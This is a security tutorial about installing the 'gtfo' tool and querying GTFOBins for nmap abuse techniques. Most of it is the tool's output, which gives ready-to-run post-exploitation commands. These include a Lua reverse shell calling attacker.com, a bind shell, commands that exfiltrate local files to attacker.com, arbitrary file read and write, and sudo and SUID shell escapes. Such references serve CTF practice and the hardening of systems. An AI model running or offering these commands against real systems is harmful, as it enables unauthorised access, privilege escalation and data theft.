Using GTFOBins and LOLBAS for Abusable Binaries During Post Exploitation

Pawing a machine is only the half battle. Gathering information and using that information to escalate further into a machine can be done through post-exploitation.

GTFOBins and LOLBAS comes-in handy providing a list of binaries that can be abused and exploited by attackers on Windows and Unix systems. If you’ve been playing CTFs challenges you might have come across GTFOBins and LOLBAS multiple times in search of exploitable binaries and it’s methods.

In this tutorial, we’ll be installing and exploring gtfo tool and search for binaries instantly on our terminal.

Installing Gtfo

The first thing we do is git clone gtfo repository.

git clone https://github.com/mzfr/gtfo

You must have python3 installed in order to install the required libraries for this project.

pip3 install -r requirements.txt

[email protected]:/opt/gtfo# pip3 install -r requirements.txt

Requirement already satisfied: pyyaml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (5.3.1)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (2.22.0)
Collecting bs4
  Using cached bs4-0.0.1.tar.gz (1.1 kB)
Requirement already satisfied: lxml in /usr/lib/python3/dist-packages (from -r requirements.txt (line 4)) (4.5.0)
Collecting requests_cache
  Downloading requests_cache-0.5.2-py2.py3-none-any.whl (22 kB)
Collecting tabulate
  Downloading tabulate-0.8.7-py3-none-any.whl (24 kB)
Requirement already satisfied: pyfiglet in /usr/local/lib/python3.8/dist-packages (from -r requirements.txt (line 7)) (0.8.post1)
Requirement already satisfied: beautifulsoup4 in /usr/lib/python3/dist-packages (from bs4->-r requirements.txt (line 3)) (4.8.2)
Building wheels for collected packages: bs4
  Building wheel for bs4 (setup.py) ... done
  Created wheel for bs4: filename=bs4-0.0.1-py3-none-any.whl size=1272 sha256=d02f9917a57f48be44f37ed0929dfef21534acded8fa024acb27d58b00637cd7
  Stored in directory: /root/.cache/pip/wheels/75/78/21/68b124549c9bdc94f822c02fb9aa3578a669843f9767776bca
Successfully built bs4
Installing collected packages: bs4, requests-cache, tabulate
Successfully installed bs4-0.0.1 requests-cache-0.5.2 tabulate-0.8.7

The required dependencies are now installed. You can run gtfo now!

./gtfo -h

   _  _           _    __      
 _| || |_        | |  / _|     
|_  __  _|   __ _| |_| |_ ___  
 _| || |_   / _` | __|  _/ _ \ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    \__, |\__|_| \___/ 
             __/ |             
            |___/              



usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe})

optional arguments:
  -h, --help            show this help message and exit
  -b BINS, --bins BINS  Search binaries on GTFOBins
  -e EXE, --exe EXE     Search Windows exe on LOLBAS
  -w LINK, --link LINK  gtfobins link to the page
  -ls {bins,exe}, --list {bins,exe}
                        list all the available binaries

In order to run gtfo binary from anywhere in the terminal create a symbolic link to gtfo binary cd /usr/local/bin

Now

[email protected]:/usr/local/bin# ln -s /opt/gtfo/gtfo gtfo 
[email protected]:/usr/local/bin# ls -la gtfo 
lrwxrwxrwx 1 root root 14 Nov 15 19:06 gtfo -> /opt/gtfo/gtfo

Now just type gtfo in anywhere in the terminal.

Using Gtfo for searching binaries

To find which options you have type gtfo -h

[email protected]:~# gtfo -h
   _  _           _    __      
 _| || |_        | |  / _|     
|_  __  _|   __ _| |_| |_ ___  
 _| || |_   / _` | __|  _/ _ \ 
|_  __  _| | (_| | |_| || (_) |
  |_||_|    \__, |\__|_| \___/ 
             __/ |             
            |___/              



usage: gtfo [-h] (-b BINS | -e EXE | -w LINK | -ls {bins,exe})

optional arguments:
  -h, --help            show this help message and exit
  -b BINS, --bins BINS  Search binaries on GTFOBins
  -e EXE, --exe EXE     Search Windows exe on LOLBAS
  -w LINK, --link LINK  gtfobins link to the page
  -ls {bins,exe}, --list {bins,exe}
                        list all the available binaries

To fetch information about the specific binary we’re going to type

gtfo -b nmap

   _  _           _    __                                                                                                                                                                                                                                                                                     [74/123]
 _| || |_        | |  / _|                                                   
|_  __  _|   __ _| |_| |_ ___                                                
 _| || |_   / _` | __|  _/ _ \                                               
|_  __  _| | (_| | |_| || (_) |                                              
  |_||_|    \__, |\__|_| \___/                                               
             __/ |                                                           
            |___/                                                            
                                                                             


# Input echo is disabled.                                                                                                                                                                                                                                                                                             
Code:   TF=$(mktemp)                                                         
        echo 'os.execute("/bin/sh")' > $TF                                   
        nmap --script=$TF                                                    
                                                                             
Type:   shell                                                                                                                                              

                                                                             
# The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
Code:   nmap --interactive                                                   
        nmap> !sh                                                                                                                                          
                                                                             
Type:   shell                                                                
                                                                             
                                                                             
# Run ``nc -l -p 12345`` on the attacker box to receive the shell.
Code:   export RHOST=attacker.com                                            
        export RPORT=12345                                                   
        TF=$(mktemp)                                                         
        echo 'local s=require("socket");          
        local t=assert(s.tcp());                                             
        t:connect(os.getenv("RHOST"),os.getenv("RPORT"));                    
        while true do                                                        
          local r,x=t:receive();local f=assert(io.popen(r,"r"));
          local b=assert(f:read("*a"));t:send(b);                            
        end;                                                                 
        f:close();t:close();' > $TF                                          
        nmap --script=$TF                                                    
                                                                                                                                                           
Type:   non-interactive-reverse-shell                                        

                                                                             
# Run `nc target.com 12345` on the attacker box to connect to the shell.
Code:   export LPORT=12345                                                   
        TF=$(mktemp)                                                         
        echo 'local k=require("socket");                                                                                                                   
        local s=assert(k.bind("*",os.getenv("LPORT")));                      
        local c=s:accept();                                                  
        while true do                                                        
          local r,x=c:receive();local f=assert(io.popen(r,"r"));
          local b=assert(f:read("*a"));c:send(b);
        end;c:close();f:close();' > $TF                                      
        nmap --script=$TF                                                    
                                                                             
Type:   non-interactive-bind-shell                                           

                                                                             
# Send a local file via TCP. Run `socat -v tcp-listen:8080,reuseaddr,fork - on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
Code:   RHOST=attacker.com                                                   
        RPORT=8080                                                                                                                                         
        LFILE=file_to_send                                                   
        nmap -p $RPORT $RHOST --script http-put --script-args http-put.url=/,http-put.file=$LFILE

Type:   file-upload                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                                                      
# Send a local file via TCP. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.                                                                                                                                                                                                           
Code:   export RHOST=attacker.com                                                                                                                                                                                                                                                                                     
        export RPORT=12345                                                                                                                                                                                                                                                                                            
        export LFILE=file_to_send                                                                                                                                                                                                                                                                                     
        TF=$(mktemp)                                                                                                                                                                                                                                                                                                  
        echo 'local f=io.open(os.getenv("LFILE"), 'rb')                                                                                                                                                                                                                                                               
        local d=f:read("*a")                                                                                                                                                                                                                                                                                          
        io.close(f);                                                                                                                                                                                                                                                                                                  
        local s=require("socket");                                           
        local t=assert(s.tcp());                                             
        t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
        t:send(d);                                                           
        t:close();' > $TF                                                    
        nmap --script=$TF                                                    

Type:   file-upload                                                          


# Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., `php -S 0.0.0.0:8080`. Note that multiple connections are made to the server and the result is placed in `$TF/IP/PORT/PATH`. Also, it is important that the port is a commonly used HTTP like 80 or 8080.
Code:   RHOST=attacker.com                                                   
        RPORT=8080                                                           
        TF=$(mktemp -d)                                                      
        LFILE=file_to_save                                                   
        nmap -p $RPORT $RHOST --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=$LFILE

Type:   file-download                                                        


# Fetch a remote file via TCP. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
Code:   export LPORT=12345                                                   
        export LFILE=file_to_save                                            
        TF=$(mktemp)                                                         
        echo 'local k=require("socket");
        local s=assert(k.bind("*",os.getenv("LPORT")));
        local c=s:accept();                                                  
        local d,x=c:receive("*a");                                           
        c:close();                                                           
        local f=io.open(os.getenv("LFILE"), "wb");
        f:write(d);                                                          
        io.close(f);' > $TF                                                  
        nmap --script=$TF                                                    

Type:   file-download                                                        


Code:   TF=$(mktemp)                                                         
        echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
        nmap --script=$TF                                                    

Type:   file-write                                                           


Code:   TF=$(mktemp)                                                         
        echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
        nmap --script=$TF                                                    

Type:   file-read                                                            


# Input echo is disabled.                                                    
Code:   TF=$(mktemp)                                                         
        echo 'os.execute("/bin/sh")' > $TF
        sudo nmap --script=$TF    

Type:   sudo                                                                 


# The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
Code:   sudo nmap --interactive                                              
        nmap> !sh                                                            

Type:   sudo                                                                 


# Input echo is disabled.                                                    
Code:   TF=$(mktemp)                                                         
        echo 'os.execute("/bin/sh")' > $TF
        ./nmap --script=$TF                                                  

Type:   limited-suid

If you want a direct link for GTFOBinaries you can type gtfo -w nmap

gtfo -w

Back to top button
Close